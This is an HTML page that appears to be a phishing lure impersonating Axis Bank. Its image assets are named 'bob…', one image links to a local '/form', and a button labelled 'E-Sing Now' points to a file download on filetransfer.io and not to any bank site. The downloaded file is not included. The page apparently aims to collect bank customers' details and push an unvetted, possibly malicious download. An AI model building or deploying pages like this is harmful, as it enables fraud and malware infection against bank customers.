<!DOCTYPE html>
<html>
  <head>
    <title>Axis Bank</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
    <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"
      crossorigin="anonymous"
    />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swiper@10/swiper-bundle.min.css" />
  </head>
  <body class="m-0">
    <div class="container">
      <div class="">
        <img class="img-fluid" src="./images/bob3.jpg" alt="" />
      </div>
    </div>
    <div>
      <a href="/form">
        <img class="img-fluid" src="./images/bobphoto4.jpg" alt="" />
      </a>
    </div>
    <div>
      <img class="img-fluid" src="./images/bobphoto3.jpg" alt="" />
      <img style="width: 100vw" class="img-fluid" src="./images/bobphoto2.jpg" alt="" />
      <img style="width: 100vw" class="img-fluid" src="./images/bobphoto5.png" alt="" />
      <img style="width: 100vw" class="img-fluid" src="./images/bobphoto6.png" alt="" />

      <div class="text-center my-5">
        <a
          style="background-color: #db3e57; text-decoration: #ffffff; padding: 20px 40px; border-radius: 5px"
          class=""
          href="https://filetransfer.io/data-package/xdWFWWou/download"
        >
          <span class="elementor-button-content-wrapper">
            <span style="font-size: 18px; color: #ffffff" class="elementor-button-text">E-Sing Now</span>
          </span>
        </a>
      </div>
    </div>
  </body>
  <script src="https://cdn.jsdelivr.net/npm/swiper@10/swiper-bundle.min.js"></script>

  <!-- Initialize Swiper -->

  <script
    src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
    integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
    crossorigin="anonymous"
  ></script>
  <script
    src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"
    integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
    crossorigin="anonymous"
  ></script>
  <script
    src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"
    integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
    crossorigin="anonymous"
  ></script>

  <script
    src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
    crossorigin="anonymous"
  ></script>
</html>
